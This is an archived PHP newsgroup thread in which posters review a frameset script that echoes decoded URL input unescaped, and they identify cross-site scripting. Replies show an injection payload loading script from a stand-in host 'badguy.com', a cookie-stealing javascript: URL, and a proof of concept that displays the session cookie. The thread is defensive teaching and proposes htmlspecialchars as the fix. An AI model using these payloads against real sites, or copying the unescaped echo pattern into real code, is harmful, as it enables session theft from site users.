Does this php script cause a security hole?

Re: Does this php script cause a security hole?

No securtiy issues that I can see (though I wouldn't take my word alone), as
it doesn't take any input from the user apart from clicking the link, which
is not handled by PHP anyway...

HTH

<jasonbrown1999 @yahoo.co.uk> wrote in message
news:1105662298 .516750.230480@ z14g2000cwz.goo glegroups.com.. .[color=blue]
> Someone told me the following script could be used to run harmful
> commands on the server, by passing commands into the script. What the
> script does is encode an affiliate URL, create two frames, with the
> affiliate URL decoded and placed in the bottom URL. The top frame
> contains http://www.domain.com/selectanothercard.html for navigation
> back to the originating site.
>
> The script is accessed with a link like this:
>
> <a href="sendcard. php?url=<? echo
> base64_encode(" http://affiliateurl.co m/ecards/fourthjuly11107/index.php?en=1& aid=12345");
> ?>" target=_top>Sen d Card</a>
>
> The affiliate URL is first encoded, because otherwise it breaks (the
> ampersands cause problems). I tried another frame re-directing script,
> but it wouldn't carry through the affiliate info properly, so someone
> created this php script to encode/decode and create the frames.
>
> Could this script be used to send harmful commands to the server? If
> so, is there any way of modifying the script to fix that? Perhaps there
> are other alternatives to passing an affiliate URL into a frame like
> this script does?
>
> Jason
>
> <html>
> <head>
> <title></title>
> <meta http-equiv="Content-Type" content="text/html;
> charset=iso-8859-1">
> </head>
> <frameset rows="50,*" cols="*" framespacing="0 " frameborder="NO "
> border="0">
> <frame src="http://www.domain.com/selectanotherca rd.html"
> name="topFrame" scrolling="NO" noresize >
> <frame src="<? echo base64_decode($ url); ?>" name="mainFrame ">
> </frameset>
> <noframes>
> <body>
> Your browser does not support frames.
> </body>
> </noframes>
> </html>
>
> <?
> //////////////////////////////////////////////////////////////////////////////
> // NOTES
> //////////////////////////////////////////////////////////////////////////////
> /*
>
> HOW TO LINK TO THIS FRAMESET
> ----------------------------
>
> * Your document that contains the links, must have the file extension
> .php
>
> EXAMPLE LINK:
>
> <a href="sendcard. php?url=<? echo
> base64_encode(" http://affiliateurl.co m/ecards/fourthjuly11107/index.php?en=1& aid=12345");
> ?>" target=_top>Sen d Card</a>
>
> */
>
> //////////////////////////////////////////////////////////////////////////////
> // END NOTES
> //////////////////////////////////////////////////////////////////////////////
> ?>
>[/color]

Re: Does this php script cause a security hole?

On second inspection, there may be an issue if you have register globals
enabled... this is because of this code:

<? echo base64_decode($ url); ?>

If you have register_global s enabled on your web-server, then an attacker
could put data into the $url variable via the URL, which is bad... In order
to fix it, I recommend sanitizing the $url var before you use it (maybe even
after you've decoded it), then once you've sanatized the input, embed it
into the href attribute of the <a> tag.

HTH

"Aidan" <nospam.aidan@l inknet.com.au> wrote in message
news:newscache$ 79baai$bnc$1@ti tan.linknet.com .au...[color=blue]
> No securtiy issues that I can see (though I wouldn't take my word alone),
> as it doesn't take any input from the user apart from clicking the link,
> which is not handled by PHP anyway...
>
> HTH
>
> <jasonbrown1999 @yahoo.co.uk> wrote in message
> news:1105662298 .516750.230480@ z14g2000cwz.goo glegroups.com.. .[color=green]
>> Someone told me the following script could be used to run harmful
>> commands on the server, by passing commands into the script. What the
>> script does is encode an affiliate URL, create two frames, with the
>> affiliate URL decoded and placed in the bottom URL. The top frame
>> contains http://www.domain.com/selectanothercard.html for navigation
>> back to the originating site.
>>
>> The script is accessed with a link like this:
>>
>> <a href="sendcard. php?url=<? echo
>> base64_encode(" http://affiliateurl.co m/ecards/fourthjuly11107/index.php?en=1& aid=12345");
>> ?>" target=_top>Sen d Card</a>
>>
>> The affiliate URL is first encoded, because otherwise it breaks (the
>> ampersands cause problems). I tried another frame re-directing script,
>> but it wouldn't carry through the affiliate info properly, so someone
>> created this php script to encode/decode and create the frames.
>>
>> Could this script be used to send harmful commands to the server? If
>> so, is there any way of modifying the script to fix that? Perhaps there
>> are other alternatives to passing an affiliate URL into a frame like
>> this script does?
>>
>> Jason
>>
>> <html>
>> <head>
>> <title></title>
>> <meta http-equiv="Content-Type" content="text/html;
>> charset=iso-8859-1">
>> </head>
>> <frameset rows="50,*" cols="*" framespacing="0 " frameborder="NO "
>> border="0">
>> <frame src="http://www.domain.com/selectanotherca rd.html"
>> name="topFrame" scrolling="NO" noresize >
>> <frame src="<? echo base64_decode($ url); ?>" name="mainFrame ">
>> </frameset>
>> <noframes>
>> <body>
>> Your browser does not support frames.
>> </body>
>> </noframes>
>> </html>
>>
>> <?
>> //////////////////////////////////////////////////////////////////////////////
>> // NOTES
>> //////////////////////////////////////////////////////////////////////////////
>> /*
>>
>> HOW TO LINK TO THIS FRAMESET
>> ----------------------------
>>
>> * Your document that contains the links, must have the file extension
>> .php
>>
>> EXAMPLE LINK:
>>
>> <a href="sendcard. php?url=<? echo
>> base64_encode(" http://affiliateurl.co m/ecards/fourthjuly11107/index.php?en=1& aid=12345");
>> ?>" target=_top>Sen d Card</a>
>>
>> */
>>
>> //////////////////////////////////////////////////////////////////////////////
>> // END NOTES
>> //////////////////////////////////////////////////////////////////////////////
>> ?>
>>[/color]
>
>[/color]

Re: Does this php script cause a security hole?

<jasonbrown1999 @yahoo.co.uk> wrote in message
news:1105662298 .516750.230480@ z14g2000cwz.goo glegroups.com.. .[color=blue]
> Someone told me the following script could be used to run harmful
> commands on the server, by passing commands into the script. What the
> script does is encode an affiliate URL, create two frames, with the
> affiliate URL decoded and placed in the bottom URL. The top frame
> contains http://www.domain.com/selectanothercard.html for navigation
> back to the originating site.
>[/color]

I don't see any server side problem either. There could be a cross-site
scripting vulnerability in the code though. If I email the following url to
unsuspecting users of your site:

http://whatever.net/sendcard.php?url...ocument.cookie)

then I can potentially steal the cookie (PHP session id et al) when they
click on the link. I'm hedging my response a bit, because Javascript
execution is more limited in a frameset page. I'm 90% sure though that the
browser would run the JS snippet in the URL.

There's almost a potential for a phishing attack.

Re: Does this php script cause a security hole?

jasonbrown1999@ yahoo.co.uk wrote:
[color=blue]
> Someone told me the following script could be used to run harmful
> commands on the server, by passing commands into the script.[/color]

If in doubt, assume your code is insecure.

Basic rule of thumb is "Never use variables the come from the client for
anything without checking them first." (especially the querystring as its
the first place someone will try to tinker)

--

Rick

Digital Printing
www.intelligence-direct.com - 01270 215550

Re: Does this php script cause a security hole?

jasonbrown1999@ yahoo.co.uk wrote:[color=blue]
> Someone told me the following script could be used to run harmful
> commands on the server, by passing commands into the script. What the
> script does is encode an affiliate URL, create two frames, with the
> affiliate URL decoded and placed in the bottom URL. The top frame
> contains http://www.domain.com/selectanothercard.html for navigation
> back to the originating site.[/color]

I'd rather use the 'Back' button in my broswer.
[color=blue]
>
> The script is accessed with a link like this:
>
> <a href="sendcard. php?url=<? echo
> base64_encode(" http://affiliateurl.co m/ecards/fourthjuly11107/index.php?en=1& aid=12345");
> ?>" target=_top>Sen d Card</a>
>
> The affiliate URL is first encoded, because otherwise it breaks (the
> ampersands cause problems). I tried another frame re-directing script,
> but it wouldn't carry through the affiliate info properly, so someone
> created this php script to encode/decode and create the frames.[/color]

With htmlspecialchar s() you get a shorter encoding.
[color=blue]
>
> Could this script be used to send harmful commands to the server? If
> so, is there any way of modifying the script to fix that? Perhaps there
> are other alternatives to passing an affiliate URL into a frame like
> this script does?
>
> Jason
>
> <html>
> <head>
> <title></title>
> <meta http-equiv="Content-Type" content="text/html;
> charset=iso-8859-1">
> </head>
> <frameset rows="50,*" cols="*" framespacing="0 " frameborder="NO "
> border="0">
> <frame src="http://www.domain.com/selectanotherca rd.html"
> name="topFrame" scrolling="NO" noresize >
> <frame src="<? echo base64_decode($ url); ?>" name="mainFrame ">[/color]

Suposse that base64_decode($ url); decodes to the following:

"></frameset> <script
src="http://www.badguy.com/nasty_thing.js" ></script><input type="hidden"
value="

(note that the first quotes will close the starting quotes from <frame
src=" and then the <input> will leave open quotes that match the ending
quote of <frame src="...">)

The resulting HTML sent to the browser would be:

....
<frame src=""></frameset> <script
src="http://www.badguy.com/nasty_thing.js" ></script><input type="hidden"
value="" name="mainFrame ">
....


In that case your frameset HTML code will be compromised (nasty_thing.js
could do things like rewriting your documents, or loading a URL of its
choice into any of them [however, the browser might set some
restrictions for scripts belonging to another domain name]).

The fix is simple: use htmlspecialchar s(base64_decode ($url)). The quotes
will be replaced by &quot; and the processed HTML code will look like:

<frame src="&quot;&gt; &lt;/frameset&gt; &lt;script
src=&quot;http://www.badguy.com/nasty_thing.js...t&gt;&lt;input
type=&quot;hidd en&quot; value=&quot;" name="mainFrame ">
....

which will confuse the browser (invalid URL for src) but nothing else.


[color=blue]
> </frameset>
> <noframes>
> <body>
> Your browser does not support frames.[/color]

You should try your best to deliver useful content to the user.
[color=blue]
> </body>
> </noframes>
> </html>
>[/color]
<snip>

Re: Does this php script cause a security hole?

> I'd rather use the 'Back' button in my broswer.

That would have been simpler, but it requires 2 clicks to get back to
my site, otherwise you're sent forwards again, because of how the
affiliate program is set up.

The altered script looks like the following? I don't need to adjust the
'encode' URL as well?

<frame src="<? echo htmlspecialchar s(base64_decode ($url)); ?>"
name="mainFrame ">
</frameset>

Jason

Re: Does this php script cause a security hole?

"Chung Leong" <chernyshevsky@ hotmail.com> wrote in message
news:e5Kdndu1ze MGr3rcRVn-sw@comcast.com. ..[color=blue]
> <jasonbrown1999 @yahoo.co.uk> wrote in message
> news:1105662298 .516750.230480@ z14g2000cwz.goo glegroups.com.. .[color=green]
> > Someone told me the following script could be used to run harmful
> > commands on the server, by passing commands into the script. What the
> > script does is encode an affiliate URL, create two frames, with the
> > affiliate URL decoded and placed in the bottom URL. The top frame
> > contains http://www.domain.com/selectanothercard.html for navigation
> > back to the originating site.
> >[/color]
>
> I don't see any server side problem either. There could be a cross-site
> scripting vulnerability in the code though. If I email the following url[/color]
to[color=blue]
> unsuspecting users of your site:
>
> http://whatever.net/sendcard.php?url...ocument.cookie)
>
> then I can potentially steal the cookie (PHP session id et al) when they
> click on the link. I'm hedging my response a bit, because Javascript
> execution is more limited in a frameset page. I'm 90% sure though that the
> browser would run the JS snippet in the URL.
>
> There's almost a potential for a phishing attack.
>[/color]

Yup, it does work. The following code will bring up the PHP session id:

<? session_start() ; ?>
<frameset rows="50,50">
<frame src="http://localhost/test/info.php">
<frame src="javascript : alert(parent.do cument.cookie); ">
</frameset>

To actually exploit it, someone would replace alert() with code that send
the cookie to another web site.

Re: Does this php script cause a security hole?

<jasonbrown1999 @yahoo.co.uk> wrote in message
news:1105662298 .516750.230480@ z14g2000cwz.goo glegroups.com.. .[color=blue]
> Someone told me the following script could be used to run harmful
> commands on the server, by passing commands into the script. What the
> script does is encode an affiliate URL, create two frames, with the
> affiliate URL decoded and placed in the bottom URL. The top frame
> contains http://www.domain.com/selectanothercard.html for navigation
> back to the originating site.
>
> The script is accessed with a link like this:
>
> <a href="sendcard. php?url=<? echo
>[/color]
base64_encode(" http://affiliateurl.co m/ecards/fourthjuly11107/index.php?en=1
&aid=12345") ;[color=blue]
> ?>" target=_top>Sen d Card</a>
>
> The affiliate URL is first encoded, because otherwise it breaks (the
> ampersands cause problems). I tried another frame re-directing script,
> but it wouldn't carry through the affiliate info properly, so someone
> created this php script to encode/decode and create the frames.[/color]

And your problem with using urlencode is? Furthermore, is it realy nessecary
to send all that information to your server via a URL?
[color=blue]
> Could this script be used to send harmful commands to the server?[/color]

Yes, but the problem does not rest with the affiliate script, it depends on
the what the script (sendcard.php) that processes the link does with the
information.